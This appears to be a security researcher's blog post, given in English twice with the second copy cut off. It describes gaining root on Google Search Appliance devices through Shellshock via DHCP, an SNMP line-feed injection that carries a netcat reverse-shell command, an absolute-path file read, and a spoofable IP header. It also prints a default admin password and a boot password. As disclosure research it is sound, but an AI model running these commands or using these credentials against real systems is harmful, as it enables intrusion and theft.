Channel: DEVCORE 戴夫寇爾

[REL] A Journey Into Hacking Google Search Appliance


English Version, 中文版本

TL;DR

  • GSA Admin console post-authentication Remote Code Execution.
  • GSA Search interface Path traversal.
  • GSA uses Oracle’s Outside-in Technology to convert documents.
  • Google Web services have some fixed URIs that provide information about the service itself.

Introduction

The Google Search Appliance (hereinafter GSA) is an enterprise search device that Google launched in 2002 for indexing and retrieving information on internal or public networks. Around 2005, Google introduced the Google Mini for personal and small-business use. At the end of 2008, it released a virtual machine version called the Virtual Google Search Appliance (hereinafter vGSA). At the end of 2018, Google ended the life cycle of the GSA product and folded it into the Cloud Search product line.

Appliance and Software Acquisition

We managed to purchase a device by searching “Google Search Appliance” on eBay.

Luckily, the first one we bought was a GSA with unerased data:

Even now, devices can still be found for sale:

On the other hand, the original public download links for vGSA have been removed:

http://dl.google.com/vgsa/vgsa_20090210.7z [removed]
http://dl.google.com/vgsa/vgsa_20081028.7z [removed]

We found the file through a BitTorrent magnet link:

magnet:?xt=urn:btih:89388ACE8C3B91FDD3A2F86D8CBB78C58A70D992

Next, we found a link to an older software version in Google Groups: https://groups.google.com/g/google-search-appliance-help/c/Qn5aO5r2Joo/m/PTw8ZDWu6vYJ

The link was:

http://dl.google.com/dl/enterprise/install_bundle-10000622-7.2.0-112.bin [removed]

All version numbers can be obtained from: http://web.archive.org/web/20210116194907/https://support.google.com/gsa/answer/7020590?hl=en&ref_topic=2709671

We guessed that the file naming rule is install_bundle-10000(3-digit number)-7.(number).(number)-(number).bin

and wrote a shell script to attempt downloading the software:

for((j=622;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.2.0-$i.bin;done;done
for((j=661;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.4.0-$i.bin;done;done
for((j=693;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.6.0-$i.bin;done;done
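The same enumeration can be sketched in Python. This is a minimal illustration, not the script we ran: the function name candidate_urls and the BASE constant are hypothetical, and the sketch only builds candidate URLs from the guessed naming rule without downloading anything.

```python
from itertools import product

# Download directory taken from the known install_bundle link.
BASE = "http://dl.google.com/dl/enterprise"


def candidate_urls(version, build_ids, revisions):
    """Yield candidate install_bundle URLs for one version string.

    The pattern follows the guessed rule
    install_bundle-10000<3 digits>-<version>-<revision>.bin.
    """
    for build_id, revision in product(build_ids, revisions):
        yield f"{BASE}/install_bundle-10000{build_id:03d}-{version}-{revision}.bin"


if __name__ == "__main__":
    # Same search space as the first shell loop: j in 622..998, i in 1..443.
    urls = candidate_urls("7.2.0", range(622, 999), range(1, 444))
    print(next(urls))
```

Each generated URL could then be handed to a downloader of your choice; keeping generation separate from fetching makes it easy to check the search space first.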

Together with files located through internet searches, we successfully retrieved the following files:

all_langs-lang-pack-2.1-1.bin
all_langs-lang-pack-2.2-1.bin
centos_patch_files-6.0.0-22.bin
centos_patch_files-6.14.0-28.bin
centos_patch_files-7.0.14-238.bin
centos_patch_files-7.2.0-252.bin
centos_patch_files-7.2.0-264.bin
centos_patch_files-7.2.0-270.bin
centos_patch_files-7.2.0-280.bin
centos_patch_files-7.2.0-286.bin
install_bundle-10000653-7.2.0-252.bin
install_bundle-10000658-7.2.0-264.bin
install_bundle-10000661-7.2.0-270.bin
install_bundle-10000681-7.4.0-64.bin
install_bundle-10000685-7.4.0-72.bin
install_bundle-10000686-7.4.0-74.bin
install_bundle-10000692-7.4.0-82.bin
install_bundle-10000762-7.6.0-36.bin
install_bundle-10000767-7.6.0-42.bin
install_bundle-10000772-7.6.0-46.bin
install_bundle-10000781-7.6.0-58.bin
install_bundle-10000810-7.6.50-30.bin
install_bundle-10000822-7.6.50-36.bin
install_bundle-10000855-7.6.50-64.bin
install_bundle-10000878-7.6.250-12.bin
install_bundle-10000888-7.6.250-20.bin
install_bundle-10000901-7.6.250-26.bin
install_bundle-10000915-7.6.360-10.bin
install_bundle-10000926-7.6.360-16.bin
install_bundle-10000967-7.6.512-18.bin
sw_files-5.0.4-22.bin
sw_files-6.14.0-28.bin
sw_files-7.0.14-238.bin
vm_patch_1_for_504_G22_and_G24_only.bin

vGSA (Virtual Google Search Appliance)

Next, we began researching vGSA. By default, after the virtual machine is imported, the system only offers a network configuration function and provides no system shell. However, because the virtual machine runs in our own environment, it is usually possible to obtain system privileges through the following methods:

  • Directly altering unencrypted disk files
  • Modifying the virtual machine memory
  • Booting using CDs or disks from another operating system
  • Exploiting known vulnerabilities
  • Utilizing hard-coded administrator or system account passwords

The following image shows the network configuration screen:

CVE-2014-6271

When testing early Linux appliances and servers, especially those based on Red Hat family operating systems, Shellshock vulnerabilities are common, and the vGSA released in 2008 is no exception. A value that the DHCP server supplies in option 114 is placed into an environment variable, which triggers the vulnerability and executes arbitrary commands.

The injected command was: useradd zzzzgsa. The console output shows that this command is executed repeatedly, since error messages keep appearing.
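As a rough illustration of why this works: a bash version affected by CVE-2014-6271 treats an environment variable whose value begins with "() {" as a function definition and keeps executing whatever follows the function body. The sketch below only builds and recognizes such a value. The helper names are hypothetical, the absolute path to useradd is an assumption, and how the DHCP client maps option 114 to a variable is not shown.

```python
SHELLSHOCK_PREFIX = "() {"


def shellshock_value(command):
    """Build an environment value in the classic CVE-2014-6271 shape.

    A vulnerable bash imports "() { :; }" as a function and then runs
    the trailing command while parsing the variable.
    """
    return f"() {{ :; }}; {command}"


def looks_like_shellshock(value):
    """Heuristic check that a DHCP-supplied string has the function prefix."""
    return value.lstrip().startswith(SHELLSHOCK_PREFIX)


if __name__ == "__main__":
    # /usr/sbin/useradd is an assumed path; the article only names the command.
    option_114 = shellshock_value("/usr/sbin/useradd zzzzgsa")
    print(option_114)
    print(looks_like_shellshock(option_114))
```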

vGSA operating system observations

After successfully obtaining operating system privileges, we can observe the network environment, the running applications, and the file system. Here are some insights gained from observing the operating system environment:

  • Version number is 5.2.0.G.27.
  • Services are mainly written in C/C++, Java, Python.
  • /export/hda3 seems to be the directory primarily used by the service.
  • /etc/shadow contains the root account with password hash x███████████M.
  • The administration interface listens on ports 8000 and 8443, with the default admin password j0njlRXpU5CQ.
  • /.gnupg contains ent_box_key public and private keys.
  • /.gnupg contains google_license_key public key.
  • /.ssh/authorized_keys contains two sets of public keys.
  • /root/.ssh/authorized_keys contains one set of public keys.
  • /root/.ssh/ contains two sets of SSH public and private keys.
  • /root/.gnupg/ contains ent_box_key public and private keys.
  • Oracle’s Outside In Technology is used to convert documents into HTML web pages.
  • The Java runtime environment uses a Security Manager for protection.
  • The engineer support request function uses ppp to build a virtual private network; /etc/ppp/chap-secrets contains account passwords ( z██████c, ]███████T ).
  • The boot menu password in /etc/lilo.conf is cmBalx7.
  • /export/hda3/versionmanager/google_key.symmetric has a string that seems to be used for symmetric encryption.
  • /export/hda3/versionmanager/vmanager_passwd contains two sets of username-password combinations ( admin: M█████████████████████████w=:9██= google:w█████████████████████████o=:N██= ).

Executable programs with network services are as follows:

Listen Port | Process Name | Program Language | Function
22 | ssh | C/C++ | OpenSSH Server
53 | named | C/C++ | Bind Named
953 | named | C/C++ | Bind Named
1111 | webserver_config | python | Installer
2100 | adminrunner.py | python | admin console backend
3990 | monitor | C/C++ | monitor
4000 | rtserver | C/C++ | unknown
4430 | EnterpriseFrontend | Java (with security manager) | admin console frontend
4911 | borgmon | C/C++ | borgmon
4916 | reactor | C/C++ | unknown
5000 | rtserver | C/C++ | unknown
5600 | rtserver | C/C++ | unknown
6600 | cacheserver | C/C++ | unknown
7800 | EnterpriseFrontend | Java (with security manager) | admin console frontend (http)
7880 | TableServer | Java (with security manager) | unknown
7882 | AuthzChecker | Java (without security manager) | unknown
7886 | tomcat | Java | tomcat server
8000 | EnterpriseAdminConsole | Java (without security manager) | unknown
8443 | stunnel | C/C++ | redirect http to https
8888 | GWS | C/C++ | unknown
9300 | oneboxserver | C/C++ | unknown
9328 | entspellmixer | C/C++ | unknown
9400 | mixserver | C/C++ | unknown
9402 | mixserver | C/C++ | unknown
9448 | qrewrite | C/C++ | unknown
9450 | EnterpriseAdminConsole | Java (without security manager) | unknown
10094 | enterprise_onebox | C/C++ | unknown
10200 | clustering_server | C/C++ | unknown
11913 | sessionmanager | C/C++ | unknown
12345 | RegistryServer | Java (without security manager) | unknown
19780 | configmgr/ent_configmgr.py | python | unknown
19900 | feedergate | C/C++ | extract, transform and feed records
21200 | FileSystemGateway | Java (with security manager) | unknown
31300 | rtserver | C/C++ | unknown

Despite the presence of so many services, most connections are blocked by iptables. The following are the iptables settings:

# Redirect privileged ports.
# (we listen as nobody, which can't attach to low ports, so redirect to high ports)
#
-A PREROUTING -i eth0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 7800
-A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 4430
-A PREROUTING -i eth0 -p tcp -m tcp --dport 444 -j REDIRECT --to-ports 4431
-A INPUT -i eth0 -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7800 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7801 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4430 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4431 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 19900 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8000 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9941 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9942 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 10999 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 68 --dport 67 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 137:138 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 123 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 514 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --dport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 162 -j ACCEPT

The following summarizes the actual accessible TCP attack surface:

Port | Service | Program Location
22 | ssh | /usr/sbin/sshd
7800 | EnterpriseFrontend | /export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
4430 | EnterpriseFrontend | /export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
19900 | feedergate | /export/hda3/5.2.0/local/google/bin/feedergate
8000 | EnterpriseAdminConsole | /export/hda3/5.2.0/local/google/bin/EnterpriseAdminConsole.jar
8443 | stunnel | /usr/sbin/stunnel
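The reachable attack surface is simply the intersection of the listening ports and the TCP ports that the INPUT chain accepts. A minimal sketch of that bookkeeping follows; the function names are hypothetical, and the parser assumes rules in exactly the iptables-save style shown in this article.

```python
import re

# TCP and UDP INPUT rules copied from the iptables listing in this article.
RULES = """\
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7800 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7801 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4430 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4431 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 19900 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8000 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9941 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9942 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 10999 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --dport 161 -j ACCEPT
"""

# Listening ports from the service table in this article.
LISTENING = {
    22, 53, 953, 1111, 2100, 3990, 4000, 4430, 4911, 4916, 5000, 5600,
    6600, 7800, 7880, 7882, 7886, 8000, 8443, 8888, 9300, 9328, 9400,
    9402, 9448, 9450, 10094, 10200, 11913, 12345, 19780, 19900, 21200,
    31300,
}


def accepted_tcp_ports(rules):
    """Collect destination ports of TCP INPUT rules that end in ACCEPT."""
    ports = set()
    for line in rules.splitlines():
        match = re.fullmatch(
            r"-A INPUT .*-p tcp .*--dport (\d+) -j ACCEPT", line.strip()
        )
        if match:
            ports.add(int(match.group(1)))
    return ports


def reachable(listening, rules):
    """Ports that are both listening and allowed through the firewall."""
    return sorted(listening & accepted_tcp_ports(rules))


if __name__ == "__main__":
    print(reachable(LISTENING, RULES))
```

Ports such as 7801, 4431, 9941, 9942, and 10999 are accepted by the firewall but had no listener in our observation, so they drop out of the result.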

We also found that the string in the file /export/hda3/versionmanager/google_key.symmetric can be used to decrypt the contents of all install bundles! Having gained privileges through CVE-2014-6271 and decrypted the install bundle contents, we temporarily concluded our research on vGSA.

However, its runtime environment lacks memory protections, so it may contain vulnerabilities that are easy to exploit.

GSA

Upon booting the installed appliance and attempting to change the boot sequence, we found that a password is required to enter the BIOS. Moreover, only some functions are accessible in the management interface of the Dell H700 RAID card:

Next, we attempted to read the hard drive contents directly. If the drive is not encrypted, the device's operating system and software may be obtained directly. The hard drive uses a SAS interface, so a SAS HBA card had to be purchased first. An LSI 9211-8i was used for the connection in this test:

After connecting and attempting to read, we discovered that this is a Self-Encrypting Drive (SED), which requires a password to unlock. OSSLab has a more detailed explanation here:

https://www.osslab.com.tw/ata-sed-security/ (Chinese article)

There are several ways to continue trying when the hard drive cannot be directly accessed:

  • Try to read the password in the BIOS EEPROM and change the boot order.

This method requires damaging the motherboard and carries some risk, so it is used only when no vulnerabilities can be found at the software level. More information: https://blog.cybercx.co.nz/bypassing-bios-password

  • Use PCILeech to read and write memory to gain system privileges.

This method requires specific PCI-e devices, which we had not prepared at the time. You can refer to this GitHub project:

https://github.com/ufrisk/pcileech

  • Look for software vulnerabilities in the accessible services.

This method is simpler and more feasible.

LF injection in Admin Console

After logging into the admin console, we noticed a feature for retrieving system information through SNMP, which also accepts custom strings:

We tried a classic LF injection here:

Inject an LF into sysContact, followed by this command:

extend shell /bin/nc -e /bin/sh 10.5.2.1 4444

After inserting the “extend” configuration directive, we can use the snmpwalk command to trigger SNMP's extend functionality and execute a shell.

The command executed successfully and connected back with a shell.
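The root cause can be modelled in a few lines. The sketch below assumes the admin console writes the sysContact value into the SNMP daemon's configuration by plain string interpolation; that behaviour is inferred from the result rather than taken from GSA source code, and all function names are hypothetical.

```python
def render_snmpd_conf(sys_contact):
    """Naively interpolate the admin-supplied value (assumed behaviour)."""
    return f"sysContact {sys_contact}\n"


def directives(conf):
    """Return the first token of every non-empty config line."""
    return [line.split()[0] for line in conf.splitlines() if line.strip()]


def reject_line_breaks(value):
    """Refuse values that could start a new config line."""
    if "\n" in value or "\r" in value:
        raise ValueError("line breaks are not allowed in sysContact")
    return value


if __name__ == "__main__":
    # Benign placeholder instead of the reverse shell used in the article.
    injected = "admin@example.com\nextend demo /bin/true"
    print(directives(render_snmpd_conf(injected)))
```

With the line feed in place, the configuration contains a second directive, extend, that the operator never intended. Rejecting CR and LF in the field, as reject_line_breaks does, is one way such a form could avoid this.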

Arbitrary File Reading

Starting with the GSA 6.x series, we found from the RPM installation packages that the web services on ports 80/443 use Apache httpd. Several HTTP configuration files are located in /etc/httpd/conf.d/. In gsa-http.conf and gsa-https.conf, certain directories are proxied to specific local services.

  RewriteEngine on
  RewriteRule ^/security-manager/(.*) http://localhost:7886/security-manager/$1 [P,L]
  RewriteRule ^/d██████████/(.*) http://localhost:7890/dps/d██████████/$1 [P,L]
  RewriteRule ^/s██████/(.*) http://localhost:7890/dps/s██████/$1 [P,L]
  RewriteRule ^/v█████/(.*) http://localhost:7890/v█████/$1 [P,L]
  RewriteRule ^/$ http://localhost:7800/ [P,L]
  RewriteRule ^/(.*) http://localhost:7800/$1 [P,L]

The services on ports 7886 and 7890 are run by separate Apache Tomcat servers. When two or more web servers are chained through a proxy, Tomcat's handling of the path segment ..;/ is an interesting test point. You can refer to the following talk by our colleague for more details:

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
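To make the ..;/ test point concrete, here is a simplified model of the mismatch described in that talk: the front-end rule matches the raw path, in which "..;" is an ordinary segment, while Tomcat removes ";parameter" suffixes from each segment before resolving dot segments. Both functions are illustrative approximations, and the target path /manager/html is a hypothetical example rather than something we found on the GSA.

```python
import posixpath
import re

# First RewriteRule from the Apache configuration in this article.
PROXY_RULE = re.compile(r"^/security-manager/(.*)")


def proxy_forwards(path):
    """Front-end view: the rule is matched against the raw request path."""
    return PROXY_RULE.match(path) is not None


def tomcat_view(path):
    """Simplified back-end view: drop ';params' per segment, then normalize."""
    segments = [segment.split(";", 1)[0] for segment in path.split("/")]
    return posixpath.normpath("/".join(segments))


if __name__ == "__main__":
    request = "/security-manager/..;/manager/html"
    print(proxy_forwards(request))
    print(tomcat_view(request))
```

In this model the request passes the /security-manager/ prefix rule but resolves outside that application on the back end.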

The point we are interested in is dps, which does not seem to be present in older versions of GSA. Extracting /WEB-INF/web.xml from dps.war lets us inspect the web application configuration, where we found that the /font endpoint is handled by com.documill.dps.connector.servlet.user.DPSDownloadServlet:

<servlet>
  <servlet-name>font</servlet-name>
  <servlet-class>com.documill.dps.connector.servlet.user.DPSDownloadServlet</servlet-class>
  <init-param>
    <param-name>rootDirectory</param-name>
    <param-value>work/fonts/</param-value>
  </init-param>
</servlet>
<servlet-mapping>
  <servlet-name>font</servlet-name>
  <url-pattern>/font/*</url-pattern>
</servlet-mapping>

Looking into DPSDownloadServlet:

import com.davisor.net.servlet.DownloadServlet;
import com.documill.dps.*;
import java.io.*;
import javax.servlet.ServletContext;

public class DPSDownloadServlet extends DownloadServlet implements DPSUserService {

    public DPSDownloadServlet() {
    }

    protected String getRealPath(ServletContext servletcontext, String s) throws IOException {
        DPS dps = DPSSingleton.getDPS();
        File file = dps.getHomeDir();
        if (file == null)
            throw new FileNotFoundException("DPSDownloadServlet:getRealPath:DPS home directory not specified");
        else
            return (new File(file, s)).getAbsolutePath();
    }

    private static final long serialVersionUID = 0L;
}

Step into its parent class, com.davisor.net.servlet.DownloadServlet, which DPSDownloadServlet extends:

protected void service(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
        throws ServletException, IOException {
    String s = httpservletrequest.getParameter(uriParameterName);
    if (!isValid(s)) {
        httpservletresponse.sendError(400, (new StringBuilder()).append("Invalid file path: ").append(s).toString());
        return;
    }
    File file = rootDirectory.deriveFile(s);
    if (!file.isFile())
        httpservletresponse.sendError(404, (new StringBuilder()).append("No file:").append(s).toString());
    else if (!file.canRead()) {
        httpservletresponse.sendError(403, (new StringBuilder()).append("Unreadable file:").append(s).toString());
    } else {
        long l = file.length();
        if (l > 0x7fffffffL) {
            httpservletresponse.sendError(413, (new StringBuilder()).append("File too big:").append(l).toString());
        } else {
            String s1 = MIME.getTypeFromPath(file.getName(), "application/octet-stream");
            httpservletresponse.setContentLength((int) l);
            httpservletresponse.setContentType(s1);
            httpservletresponse.setDateHeader("Last-Modified", file.lastModified());
            if (cacheExpires > 0L) {
                httpservletresponse.setDateHeader("Expires", System.currentTimeMillis() + cacheExpires);
                httpservletresponse.setHeader("Cache-Control", "public");
            }
            IO.copy(file, httpservletresponse.getOutputStream());
        }
    }
}

private static boolean isValid(String s) {
    return !Strings.isEmpty(s) && !s.contains("..");
}

You can see here that the only check is whether the string contains "..". However, we can simply specify an absolute path and read any local file directly!
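The gap in that check can be reproduced with a small Python analogue. The source of rootDirectory.deriveFile is not shown in this article, so the sketch assumes it resolves an absolute request the way os.path.join does, by discarding the root. The function names and the /tmp/fonts directory are hypothetical, and POSIX paths are assumed.

```python
import os.path


def is_valid(path):
    """Mirror of isValid: non-empty and no '..' anywhere in the string."""
    return bool(path) and ".." not in path


def derive_file(root, requested):
    """Assumed analogue of deriveFile: an absolute request replaces root."""
    return os.path.join(root, requested)


def derive_file_safely(root, requested):
    """Resolve the request and require the result to stay under root."""
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes the root directory")
    return candidate


if __name__ == "__main__":
    request = "/etc/passwd"
    print(is_valid(request))
    print(derive_file("work/fonts/", request))
```

Checking the resolved path against the root, as derive_file_safely does, covers absolute paths, dot segments, and symbolic links in one place instead of filtering substrings.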

Older versions of GSA do not have the /font endpoint, but /dps/admin/admin has a similar file reading issue: you can specify logName directly to read a file. The figure below shows the admin console account password file being read directly:

After successfully cracking the hash, you can log in, enable the SNMP service, and combine it with the first vulnerability to execute arbitrary commands with root privileges.

Other findings and misc

Internal URIs in web services

In GSA, there are multiple sub-services that communicate with each other using the HTTP protocol. Many of these services offer URLs such as /varz, /helpz, and /procz. We can access them either in the trusted network location defined for the service or using 127.0.0.1:

In vGSA, we observed a service startup parameter, “useripheader=X-User-Ip”. When a request to the externally exposed admin console includes the “X-User-Ip” header, this parameter allows direct access to this functionality.
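A hypothetical model of why such a parameter is risky: if the service takes the client address from a request header, any client that can reach the port can claim to be a trusted address. The names below, the trusted set, and the header value are assumptions for illustration only and are not GSA code.

```python
# Assumed trusted set; the article only states that 127.0.0.1 is accepted.
TRUSTED_ADDRESSES = {"127.0.0.1"}


def effective_client_ip(remote_addr, headers, user_ip_header=None):
    """Return the address used for access decisions.

    When user_ip_header is configured, the header value overrides the
    socket address. Header lookup is case-sensitive here for brevity.
    """
    if user_ip_header is not None and user_ip_header in headers:
        return headers[user_ip_header]
    return remote_addr


def may_view_internal_pages(remote_addr, headers, user_ip_header=None):
    """Allow pages such as /varz only for trusted addresses."""
    client = effective_client_ip(remote_addr, headers, user_ip_header)
    return client in TRUSTED_ADDRESSES


if __name__ == "__main__":
    spoofed = {"X-User-Ip": "127.0.0.1"}
    print(may_view_internal_pages("10.5.2.1", {}, "X-User-Ip"))
    print(may_view_internal_pages("10.5.2.1", spoofed, "X-User-Ip"))
```

Such a header is only trustworthy when a front-end proxy overwrites it on every request; a service exposed directly should rely on the socket address.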

The /procz endpoint can even fetch executables and the shared libraries they are using:

Appliances list

Model name | Maker | Specs | Version | Document count
Google Mini | Gigabyte | Pentium III 1G / 2GB memory / 120G | 3.4.14 | 300,000
Google Mini-002X | SuperMicro | Pentium 4 3G / 2GB memory / 250G HDD | 5.0.0 | unknown
Google GB-1001 | Dell Poweredge 2950 | Xeon / 16GB memory / 1.25TB HDD | unknown | 3,000,000
Google GB-1002 | Gigabyte | unknown | unknown | unknown
Google GB-7007 | Dell R710 | Xeon E5520 / 48GB memory / 3TB HDD | unknown | 10,000,000
Google GB-9009 | Dell (model unknown) | Xeon X5560 / 96GB memory / 3.6TB HDD | unknown | 30,000,000
Google G100 | Dell R720XD | unknown | unknown | unknown

Linux Kernel Version

GSA version | Linux Kernel Version
7.6.0 | Linux version 3.14.44_gsa-x64_1.5 (mrevutskyi@mrevutskyi.mtv.corp.google.com) (gcc version 4.9.x-google 20150123 (prerelease) (Google_crosstoolv18-gcc-4.9.x-x86_64-grtev4-linux-gnu) ) #1 SMP Mon Nov 23 09:19:11 PST 2015
7.4.0 | unknown
7.2.0 | Linux version 3.4.3_gsa-x64_1.5 (martincochran@ypc-ubiq202.dls.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Tue Jul 9 15:36:01 PDT 2013
7.0.14 | Linux version 3.4.3_gsa-x64_1.3 (stephenamar@neutrino.mtv.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Thu Jul 19 11:59:57 PDT 2012
5.2.0 | Linux version 2.6.20_vmw-smp_3.1 (yifeng@yifeng.corp.google.com) (gcc version 4.1.1) #1 SMP Thu Jan 24 22:34:28 PST 2008

Timeline

Date | Event
2005/06/10 | Java Code Injection CVE-2005-3757 reported by H D Moore
early 2008 | GSA 5.0 released
2008/10/28 | vgsa_20081028.7z (5.2.0) released
2013/04/20 | GSA 6.14.0.G28 released
2014/03/20 | Cross-site Scripting CVE-2014-0362 reported by Will Dormann
2014/10/01 | GSA 7.0.14.G238 released
2014/10/03 | GSA 7.2.0.G252 released
2014/12/12 | GSA 7.2.0.G264 released
2015/02/07 | GSA 7.2.0.G270 released
2015/04/15 | GSA 7.4.0.G64 released
2015/04/22 | GSA 7.4.0.G72 released
2015/04/30 | GSA 7.4.0.G74 released
2015/06/04 | GSA 7.4.0.G82 released
early 2016 | Google announced that GSA would be withdrawn from the market.
2016/01/05 | XML External Entity injection reported by Timo
2016/05/24 | GSA 7.6.0.G36 released
2016/07/01 | GSA 7.6.0.G42 released
2016/07/31 | The author of this article obtained this device, running version 7.0.14
2016/08/25 | GSA 7.6.0.G46 released
2016/10/21 | GSA 7.6.0.G58 released
2017/01/19 | GSA 7.6.50.G30 released
2017/04/19 | GSA 7.6.50.G36 released
2017/07/28 | GSA 7.6.50.G64 released
2017/11/09 | GSA 7.6.250.G12 released
2017/12/28 | The final date to order GSA.
2018/01/17 | GSA 7.6.250.G20 released
2018/03/21 | GSA 7.6.250.G26 released
2018/06/15 | GSA 7.6.360.G10 released
2018/10/08 | GSA 7.6.360.G16 released
2019/04/26 | GSA 7.6.512.G18 released. It should be the last publicly released version.
2021/08/16 | Issues reported.
2021/08/16 | A bot replied, and the report was triaged.
2021/08/16 | issuetracker.google.com assigned an issue.
2021/08/18 | Google said the issue is not severe enough to qualify for a reward, but the VRP panel will take a closer look.
2021/08/20 | The VRP panel decided that the security impact of this issue does not meet the bar for a financial reward.
2021/11/01 | We asked whether the vulnerability would be assigned a CVE identifier.
2021/11/02 | Google confirmed that a CVE identifier will not be assigned.
early 2023 | Started writing this article
2023/06/04 | First draft completed.

Conclusion

Although the GSA/vGSA has reached the end of its lifecycle, studying how Google hardens a product and reduces its attack surface broadens our knowledge in areas we do not usually encounter. Although this article does not cover them in detail, the Java Security Manager and the Linux kernel's seccomp are both used in the GSA, and this research leaves some goals for further study:

  • The feedergate service listening on port 19900.
  • Memory vulnerabilities in Oracle’s Outside-in Technology for converting file formats.
  • The convert_to_html seccomp sandbox

We will share any further research results. See you next time.


[REL] A Deep Dive into Hacking Google Search Appliance


English Version, 中文版本

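TL;DR

  • Post-authentication arbitrary command execution in the GSA admin console
  • Arbitrary file read in the GSA search interface
  • GSA uses Oracle's Outside-in Technology to convert document formats
  • Google web services expose some fixed URIs that provide information about the service itself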

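Introduction

Google Search Appliance (hereinafter GSA) is a search device that Google began offering to enterprises in 2002. It is mainly deployed on a corporate intranet to index internal network information and provide retrieval. Around 2005, Google introduced the Google Mini for personal and small-business use, and around the end of 2008 it released a virtual machine version named Virtual Google Search Appliance (hereinafter vGSA). The product reached the end of its life cycle at the end of 2018, and the product line was merged into Cloud Search.

Appliance and Software Acquisition

We searched eBay for the keyword Google Search Appliance and tried to buy the device. If the disk data had unfortunately been wiped, we could only try buying a few more units.

Luckily, the first unit we bought was a GSA that had not been completely wiped:

Devices can still be found on sale today:

On the other hand, the original public links for vGSA have been removed:

http://dl.google.com/vgsa/vgsa_20090210.7z [removed]
http://dl.google.com/vgsa/vgsa_20081028.7z [removed]

We later obtained the file through the BitTorrent magnet link magnet:?xt=urn:btih:89388ACE8C3B91FDD3A2F86D8CBB78C58A70D992.

Next, we found a link to an older software version in Google Groups: https://groups.google.com/g/google-search-appliance-help/c/Qn5aO5r2Joo/m/PTw8ZDWu6vYJ

The link was: http://dl.google.com/dl/enterprise/install_bundle-10000622-7.2.0-112.bin [removed]

Version numbers can be obtained from a public web page: http://web.archive.org/web/20210116194907/https://support.google.com/gsa/answer/7020590?hl=en&ref_topic=2709671

We guessed that the file naming rule is install_bundle-10000(three digits)-7.(one digit).(digits)-(three digits).bin

and wrote a shell script to attempt the download: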

for((j=622;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.2.0-$i.bin;done;done
for((j=661;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.4.0-$i.bin;done;done
for((j=693;j<999;j++));do for((i=1;i<444;i++));do wget http://dl.google.com/dl/enterprise/install_bundle-10000$j-7.6.0-$i.bin;done;done

Together with material found through internet searches, we successfully retrieved the following files:

all_langs-lang-pack-2.1-1.bin
all_langs-lang-pack-2.2-1.bin
centos_patch_files-6.0.0-22.bin
centos_patch_files-6.14.0-28.bin
centos_patch_files-7.0.14-238.bin
centos_patch_files-7.2.0-252.bin
centos_patch_files-7.2.0-264.bin
centos_patch_files-7.2.0-270.bin
centos_patch_files-7.2.0-280.bin
centos_patch_files-7.2.0-286.bin
install_bundle-10000653-7.2.0-252.bin
install_bundle-10000658-7.2.0-264.bin
install_bundle-10000661-7.2.0-270.bin
install_bundle-10000681-7.4.0-64.bin
install_bundle-10000685-7.4.0-72.bin
install_bundle-10000686-7.4.0-74.bin
install_bundle-10000692-7.4.0-82.bin
install_bundle-10000762-7.6.0-36.bin
install_bundle-10000767-7.6.0-42.bin
install_bundle-10000772-7.6.0-46.bin
install_bundle-10000781-7.6.0-58.bin
install_bundle-10000810-7.6.50-30.bin
install_bundle-10000822-7.6.50-36.bin
